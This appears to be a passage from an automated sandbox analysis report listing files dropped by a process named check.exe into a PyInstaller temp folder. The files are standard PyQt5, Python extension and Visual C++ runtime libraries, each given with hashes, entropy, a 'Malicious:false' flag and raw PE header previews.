                                                                                                                                                                                                                                      Entropy (8bit):6.241719144701645
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:ZYS8YHrNj4/7RsRLvYpiW3pCBU+Z7bJWvCSBYgbxGJ5M2GM/fXR1fUdihfSbCo6e:9bpj4/7RsRLvYpiW3pCBU+Z7bJWvCSBv
                                                                                                                                                                                                                                      MD5:678FA1496FFDEA3A530FA146DEDCDBCC
                                                                                                                                                                                                                                      SHA1:C80D8F1DE8AE06ECF5750C83D879D2DCC2D6A4F8
                                                                                                                                                                                                                                      SHA-256:D6E45FD8C3B3F93F52C4D1B6F9E3EE220454A73F80F65F3D70504BD55415EA37
                                                                                                                                                                                                                                      SHA-512:8D9E3FA49FB42F844D8DF241786EA9C0F55E546D373FF07E8C89AAC4F3027C62EC1BD0C9C639AFEABC034CC39E424B21DA55A1609C9F95397A66D5F0D834E88E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........}.........../....td./..../...td./...td./...td./...n../...1../......P...c./....c./....c./...Rich...........................PE..d....p.f.........." ...(.*...........+.......................................0&...........`.............................................L.....................#.$.............%.... t.......................t..(....r..@............@..(o...........................text...~(.......*.................. ..`.rdata..x....@......................@..@.data...h...........................@....pdata..$.....#......n#.............@..@.reloc.......%......L%.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtGui.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):2494976
                                                                                                                                                                                                                                      Entropy (8bit):6.232020603277999
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:SUjOoTFrwI8nc6EmRAQ9RzgpP2bXYUKuXeLQp5PjYq0zb:SUqCgnZXRAQ9RzggbozJLQp5Mq
                                                                                                                                                                                                                                      MD5:AE182C36F5839BADDC9DCB71192CFA7A
                                                                                                                                                                                                                                      SHA1:C9FA448981BA61343C7D7DECACAE300CAD416957
                                                                                                                                                                                                                                      SHA-256:A9408E3B15FF3030F0E9ACB3429000D253D3BB7206F750091A7130325F6D0D72
                                                                                                                                                                                                                                      SHA-512:8950244D828C5EDE5C3934CFE2EE229BE19CC00FBF0C4A7CCEBEC19E8641345EF5FD028511C5428E1E21CE5491A3F74FB0175B03DA17588DAEF918E3F66B206A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......... j..sj..sj..sc..sn..s.p.rh..s1..rh..s.p.ri..s.p.rb..s.p.r...s...rh..s..ro..sj..s...syw.ra..syw.rk..syw.rk..sRichj..s........PE..d....p.f.........." ...(.....................................................P&...........`.........................................`&..L....&................$...............%.....................................p...@...............@{...........................text...O........................... ..`.rdata..............................@..@.data...xz.......^...t..............@....pdata........$.......#.............@..@.reloc........%......^%.............@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\QtWidgets.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5144576
                                                                                                                                                                                                                                      Entropy (8bit):6.262739223310643
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:49152:Qi+reIG7QwktsFPKoe2yicbbqgkcY9abW7KnTYK2bjMkTDGM7y:uqT7Q1kyTvoWW7EYvM9M
                                                                                                                                                                                                                                      MD5:E8C3BFBC19378E541F5F569E2023B7AA
                                                                                                                                                                                                                                      SHA1:ACA007030C1CEE45CBC692ADCB8BCB29665792BA
                                                                                                                                                                                                                                      SHA-256:A1E97A2AB434C6AE5E56491C60172E59CDCCE42960734E8BDF5D851B79361071
                                                                                                                                                                                                                                      SHA-512:9134C2EAD00C2D19DEC499E60F91E978858766744965EAD655D2349FF92834AB267AC8026038E576A7E207D3BBD4A87CD5F2E2846A703C7F481A406130530EB0
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................=....1M............1M.....1M.....1M.....+......t.............J......J......J.....Rich...........................PE..d....p.f.........." ...(..,...!.....P.,.......................................N...........`..........................................><.T...D?<...............H..z...........pM..O..Pa8..............................`8.@.............,..............................text.....,.......,................. ..`.rdata........,.......,.............@..@.data... :....A.......A.............@....pdata...z....H..|....H.............@..@.reloc...O...pM..P...0M.............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\sip.cp313-win_amd64.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120320
                                                                                                                                                                                                                                      Entropy (8bit):6.034057886020456
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:pPd5NTdYgpmMrZhekwFH4PqgZNBQmT6V6WRFYE9Icx7pz4H5B:NhTdtmMdEkwuFTSvYE9Iczz4H5
                                                                                                                                                                                                                                      MD5:4F7F9E3A9466F4C0103FB04E1987E098
                                                                                                                                                                                                                                      SHA1:D4A339702E936AA5ECC1FE906AE2BA3BB0E481D7
                                                                                                                                                                                                                                      SHA-256:EBF27146466D61411493D2E243EAC691740F9C4B7A4B9AB0D408BE45B5E0AA35
                                                                                                                                                                                                                                      SHA-512:920BA8D58DCA7946341C1CC01FEA0B76CCE008F1D10061F84455A3DE9BA00FD9534F40C983486211BE92B85F786CD610C386529711A6F573A02BFAF8CA543A19
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........kSR...R...R...[...Z....X..P.......P....X..Q....X..Z....X.._....^..Q...R.......G_..[...G_..S...G_..S...G_..S...RichR...........PE..d.... g.........." ...(.H...........J.......................................0............`.............................................X...h................................ ..........................................@............`...............................text...(G.......H.................. ..`.rdata..lU...`...V...L..............@..@.data.... ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\VCRUNTIME140.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):120400
                                                                                                                                                                                                                                      Entropy (8bit):6.6017475353076716
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:N9TXF5LLXQLlNycKW+D4SdqJk6aN1ACuyxLiyazYaCVoecbdhgOwAd+zfZ1zu:N9jelDoD9uyxLizzFzecbdPwA87S
                                                                                                                                                                                                                                      MD5:862F820C3251E4CA6FC0AC00E4092239
                                                                                                                                                                                                                                      SHA1:EF96D84B253041B090C243594F90938E9A487A9A
                                                                                                                                                                                                                                      SHA-256:36585912E5EAF83BA9FEA0631534F690CCDC2D7BA91537166FE53E56C221E153
                                                                                                                                                                                                                                      SHA-512:2F8A0F11BCCC3A8CB99637DEEDA0158240DF0885A230F38BB7F21257C659F05646C6B61E993F87E0877F6BA06B347DDD1FC45D5C44BC4E309EF75ED882B82E4E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\=..\...\...\..S$...\...$...\...\..5\...\...\.....\.....\.....\.....\......\.....\..Rich.\..........PE..d.....x.........." ...).$...d............................................................`A........................................0u..4...d}..........................PP...........^..p............................\..@............@...............................text............................... ..`fothk........0...................... ..`.rdata...C...@...D...(..............@..@.data................l..............@....pdata...............p..............@..@_RDATA...............|..............@..@.rsrc................~..............@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\VCRUNTIME140_1.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):49744
                                                                                                                                                                                                                                      Entropy (8bit):6.701724666218339
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:ApzzO6ujT3MbR3v0Cz6SR8q83yaFdWr9zRcmgEl6U9zSC:9q/oGw3fFdwzRcmZFzSC
                                                                                                                                                                                                                                      MD5:68156F41AE9A04D89BB6625A5CD222D4
                                                                                                                                                                                                                                      SHA1:3BE29D5C53808186EBA3A024BE377EE6F267C983
                                                                                                                                                                                                                                      SHA-256:82A2F9AE1E6146AE3CB0F4BC5A62B7227E0384209D9B1AEF86BBCC105912F7CD
                                                                                                                                                                                                                                      SHA-512:F7BF8AD7CD8B450050310952C56F6A20B378A972C822CCC253EF3D7381B56FFB3CA6CE3323BEA9872674ED1C02017F78AB31E9EB9927FC6B3CBA957C247E5D57
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?.{...{...{...0...y.......y...r.H.p...{...H.......|.......`.......~.......z.....$.z.......z...Rich{...........PE..d...l0.?.........." ...).<...8.......@...............................................b....`A........................................pm.......m..x....................r..PP......D....c..p...........................`b..@............P..`............................text....;.......<.................. ..`.rdata.."#...P...$...@..............@..@.data................d..............@....pdata...............f..............@..@.rsrc................l..............@..@.reloc..D............p..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\_bz2.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):84240
                                                                                                                                                                                                                                      Entropy (8bit):6.607563436050078
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:Kdrz7l1EVLsSuvX3dUK4MLgqK7YEog8y5sV8lIJLVy7SyFB:urzcuvXvrEo7y6V8lIJLVyB
                                                                                                                                                                                                                                      MD5:CB8C06C8FA9E61E4AC5F22EEBF7F1D00
                                                                                                                                                                                                                                      SHA1:D8E0DFC8127749947B09F17C8848166BAC659F0D
                                                                                                                                                                                                                                      SHA-256:FC3B481684B926350057E263622A2A5335B149A0498A8D65C4F37E39DD90B640
                                                                                                                                                                                                                                      SHA-512:E6DA642B7200BFB78F939F7D8148581259BAA9A5EDDA282C621D14BA88083A9B9BD3D17B701E9CDE77AD1133C39BD93FC9D955BB620546BB4FCF45C68F1EC7D6
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......e...!m..!m..!m..(.o.+m..1...#m..1..."m..1...%m..1...)m..1...,m..i..."m..j...#m..!m..|m..i...)m..i... m..i... m..i... m..Rich!m..........PE..d.....g.........." ...).....\......0........................................P......7[....`.............................................H...(........0....... .. ......../...@..........T...........................`...@...............x............................text............................... ..`.rdata...=.......>..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\_ctypes.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):131344
                                                                                                                                                                                                                                      Entropy (8bit):6.311142284249784
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:3RF024DWkT/DKGkXY402iXnVJf/FO50XnekZ39gPhvEQZIJyPArm:j0nHT/DKFXZorf/FO50uW3SEQt
                                                                                                                                                                                                                                      MD5:A55E57D7594303C89B5F7A1D1D6F2B67
                                                                                                                                                                                                                                      SHA1:904A9304A07716497CF3E4EAAFD82715874C94F1
                                                                                                                                                                                                                                      SHA-256:F63C6C7E71C342084D8F1A108786CA6975A52CEFEF8BE32CC2589E6E2FE060C8
                                                                                                                                                                                                                                      SHA-512:FFA61AD2A408A831B5D86B201814256C172E764C9C1DBE0BD81A2E204E9E8117C66F5DFA56BB7D74275D23154C0ED8E10D4AE8A0D0564434E9761D754F1997FC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........h~..............q...............................................q.......q......!u.............................................Rich....................PE..d.....g.........." ...).............h....................................... .......Z....`.........................................P.................................../...........=..T............................;..@............0...............................text............................... ..`.rdata...y...0...z..................@..@.data....$....... ..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\_decimal.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):277776
                                                                                                                                                                                                                                      Entropy (8bit):6.5855511991551
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:x9iD78EIq4x4OA5bZZ0KDgQcI79qWM53pLW1AFR8E4wXw76TPlpV77777VMvyk:xwDGqr5b8EgQ5+w6k
                                                                                                                                                                                                                                      MD5:F3377F3DE29579140E2BBAEEFD334D4F
                                                                                                                                                                                                                                      SHA1:B3076C564DBDFD4CA1B7CC76F36448B0088E2341
                                                                                                                                                                                                                                      SHA-256:B715D1C18E9A9C1531F21C02003B4C6726742D1A2441A1893BC3D79D7BB50E91
                                                                                                                                                                                                                                      SHA-512:34D9591590BBA20613691A5287EF329E5927A58127CE399088B4D68A178E3AF67159A8FC55B4FCDCB08AE094753B20DEC2AC3F0B3011481E4ED6F37445CECDD5
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........j2U..\...\...\..s....\..]...\.._...\..X...\..Y...\...]...\..s]...\...].z.\..._...\...Q...\...\...\.......\...^...\.Rich..\.........................PE..d......g.........." ...).....Z...............................................P......W.....`.................................................L........0..........t+......./...@..........T...............................@............... ............................text.............................. ..`.rdata..\...........................@..@.data...8'......."..................@....pdata..t+.......,..................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\_hashlib.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):64272
                                                                                                                                                                                                                                      Entropy (8bit):6.220967684620152
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:eNJI0DWiflFwY9X3Th1JnptE462TxNvdbj4dIJvI75YiSyvE62Em:2LDxflFwY9XDhPfVNv+dIJvIF7Syc6c
                                                                                                                                                                                                                                      MD5:32D76C9ABD65A5D2671AEEDE189BC290
                                                                                                                                                                                                                                      SHA1:0D4440C9652B92B40BB92C20F3474F14E34F8D62
                                                                                                                                                                                                                                      SHA-256:838D5C8B7C3212C8429BAF612623ABBBC20A9023EEC41E34E5461B76A285B86C
                                                                                                                                                                                                                                      SHA-512:49DC391F4E63F4FF7D65D6FD837332745CC114A334FD61A7B6AA6F710B235339964B855422233FAC4510CCB9A6959896EFE880AB24A56261F78B2A0FD5860CD9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W.A.6...6...6...N%..6.......6.......6.......6.......6.......6...N...6.......6...6..26.......6.......6....I..6.......6..Rich.6..........PE..d......g.........." ...).P...~.......=..............................................!.....`.........................................p...P................................/......X....l..T............................k..@............`...............................text....N.......P.................. ..`.rdata...M...`...N...T..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..X...........................@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\_lzma.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157968
                                                                                                                                                                                                                                      Entropy (8bit):6.854644275249963
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:KbbS4R/G4Z8r7NjwJTSUqCRY4By7znfB9mNowgn0lCelIJ012+j:KbR/8oWeBi5YOwflCe8o
                                                                                                                                                                                                                                      MD5:1BA022D42024A655CF289544AE461FB8
                                                                                                                                                                                                                                      SHA1:9772A31083223ECF66751FF3851D2E3303A0764C
                                                                                                                                                                                                                                      SHA-256:D080EABD015A3569813A220FD4EA74DFF34ED2A8519A10473EB37E22B1118A06
                                                                                                                                                                                                                                      SHA-512:2B888A2D7467E29968C6BB65AF40D4B5E80722FFDDA760AD74C912F3A2F315D402F3C099FDE82F00F41DE6C9FAAEDB23A643337EB8821E594C567506E3464C62
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........7...V.,.V.,.V.,...,.V.,..-.V.,..-.V.,..-.V.,..-.V.,..-.V.,...-.V.,.V.,.V.,..-.V.,..-.V.,..u,.V.,..-.V.,Rich.V.,................PE..d......g.........." ...).`...........1.......................................p.......P....`.............................................L.......x....P.......0.......:.../...`..4....|..T...........................P{..@............p...............................text...^^.......`.................. ..`.rdata.......p.......d..............@..@.data........ ......................@....pdata.......0......................@..@.rsrc........P......................@..@.reloc..4....`.......8..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\_queue.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):33552
                                                                                                                                                                                                                                      Entropy (8bit):6.446391764486538
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:7GpPCRjqMu/AoS6rf7sif0NHQibZIJ9UoOHQIYiSy1pCQ5xX1rSJIVE8E9VF0Nyf:fkTM6rg9aeZIJ9Uok5YiSyvTo2Et
                                                                                                                                                                                                                                      MD5:1C03CAA59B5E4A7FB9B998D8C1DA165A
                                                                                                                                                                                                                                      SHA1:8A318F80A705C64076E22913C2206D9247D30CD7
                                                                                                                                                                                                                                      SHA-256:B9CF502DADCB124F693BF69ECD7077971E37174104DBDA563022D74961A67E1E
                                                                                                                                                                                                                                      SHA-512:783ECDA7A155DFC96A718D5A130FB901BBECBED05537434E779135CBA88233DD990D86ECA2F55A852C9BFB975074F7C44D8A3E4558D7C2060F411CE30B6A915F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........T...........-.........................................................................A...........Rich...................PE..d.....g.........." ...).....:.......................................................r....`.........................................PD..L....D..d....p.......`..l....T.../..........@4..T............................3..@............0...............................text............................... ..`.rdata..2....0....... ..............@..@.data........P.......>..............@....pdata..l....`.......D..............@..@.rsrc........p.......H..............@..@.reloc...............R..............@..B........................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\_socket.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):83728
                                                                                                                                                                                                                                      Entropy (8bit):6.331814573029388
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:XuV3gvWHQdMq3ORC/OypTXQlyJ+9+nzEYwsBI6tzOKuZIJywJ7Sy21:XuVQvcQTSypTXQlyJs+nzEYJI6QlZIJY
                                                                                                                                                                                                                                      MD5:FE896371430BD9551717EF12A3E7E818
                                                                                                                                                                                                                                      SHA1:E2A7716E9CE840E53E8FC79D50A77F40B353C954
                                                                                                                                                                                                                                      SHA-256:35246B04C6C7001CA448554246445A845CE116814A29B18B617EA38752E4659B
                                                                                                                                                                                                                                      SHA-512:67ECD9A07DF0A07EDD010F7E3732F3D829F482D67869D6BCE0C9A61C24C0FDC5FF4F4E4780B9211062A6371945121D8883BA2E9E2CF8EB07B628547312DFE4C9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............ll}.ll}.ll}...}.ll}..m|.ll}..o|.ll}..h|.ll}..i|.ll}..m|.ll}.lm}.ll}..m|.ll}..a|.ll}..l|.ll}..}.ll}..n|.ll}Rich.ll}........PE..d.....g.........." ...).x.......... -.......................................`.......s....`.........................................@...P............@.......0.........../...P..........T...........................@...@............................................text....w.......x.................. ..`.rdata.. y.......z...|..............@..@.data...............................@....pdata.......0......................@..@.rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\_ssl.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):181520
                                                                                                                                                                                                                                      Entropy (8bit):5.972827303352998
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:kO+IWyXHllRhN1qhep7fM6CpqjZI8u7pUULbaLZErWreVEzvT3iFCNc6tYwJc1OW:kpSrhN1E2M6CpUuwg5dEW7
                                                                                                                                                                                                                                      MD5:1C0E3E447F719FBE2601D0683EA566FC
                                                                                                                                                                                                                                      SHA1:5321AB73B36675B238AB3F798C278195223CD7B1
                                                                                                                                                                                                                                      SHA-256:63AE2FEFBFBBBC6EA39CDE0A622579D46FF55134BC8C1380289A2976B61F603E
                                                                                                                                                                                                                                      SHA-512:E1A430DA2A2F6E0A1AED7A76CC4CD2760B3164ABC20BE304C1DB3541119942508E53EA3023A52B8BADA17A6052A7A51A4453EFAD1A888ACB3B196881226C2E5C
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......FM.^.,k..,k..,k..T...,k...j..,k...h..,k...o..,k...n..,k.J.j..,k...j..,k..,j..-k.ITj..,k.J.f..,k.J.k..,k.J....,k.J.i..,k.Rich.,k.................PE..d......g.........." ...)............ /..............................................R\....`.............................................d................................/..............T...........................P...@............................................text...0........................... ..`.rdata..D%.......&..................@..@.data...`...........................@....pdata...............n..............@..@.rsrc................z..............@..@.reloc..............................@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\_wmi.pyd

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):38160
                                                                                                                                                                                                                                      Entropy (8bit):6.338856805460127
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:fEkK9VgWOZbs3550QcJpPllIJLiX5YiSyvQ602Euf0:fE93jkbQcJvlIJLiJ7Syq00
                                                                                                                                                                                                                                      MD5:1C30CC7DF3BD168D883E93C593890B43
                                                                                                                                                                                                                                      SHA1:31465425F349DAE4EDAC9D0FEABC23CE83400807
                                                                                                                                                                                                                                      SHA-256:6435C679A3A3FF4F16708EBC43F7CA62456C110AC1EA94F617D8052C90C143C7
                                                                                                                                                                                                                                      SHA-512:267A1807298797B190888F769D998357B183526DFCB25A6F1413E64C5DCCF87F51424B7E5D6F2349D7A19381909AB23B138748D8D9F5858F7DC0552F5C5846AC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........H2.&a.&a.&a..a.&a..'`.&a..%`.&a.."`.&a..'`.&a..#`.&a..'`.&a.'a..&a.."`.&a../`.&a..&`.&a...a.&a..$`.&aRich.&a................PE..d.....g.........." ...).,...<.......)..............................................'.....`.........................................0V..H...xV.......................f.../......x...tG..T............................C..@............@.......T..@....................text....*.......,.................. ..`.rdata..d ...@..."...0..............@..@.data........p.......R..............@....pdata...............V..............@..@.rsrc................Z..............@..@.reloc..x............d..............@..B................................................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\base_library.zip

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1394456
                                                                                                                                                                                                                                      Entropy (8bit):5.531698507573688
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:IW7WpLV6yNLeGQbVz3YQfiBgDPtLwjFx278e6ZQnHS91lqyL+DXUgnxOr+dx5/GO:B7WpLtHa9BHSHAW+dx5/GP05vddD
                                                                                                                                                                                                                                      MD5:A9CBD0455B46C7D14194D1F18CA8719E
                                                                                                                                                                                                                                      SHA1:E1B0C30BCCD9583949C247854F617AC8A14CBAC7
                                                                                                                                                                                                                                      SHA-256:DF6C19637D239BFEDC8CD13D20E0938C65E8FDF340622FF334DB533F2D30FA19
                                                                                                                                                                                                                                      SHA-512:B92468E71490A8800E51410DF7068DD8099E78C79A95666ECF274A9E9206359F049490B8F60B96081FAFD872EC717E67020364BCFA972F26F0D77A959637E528
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
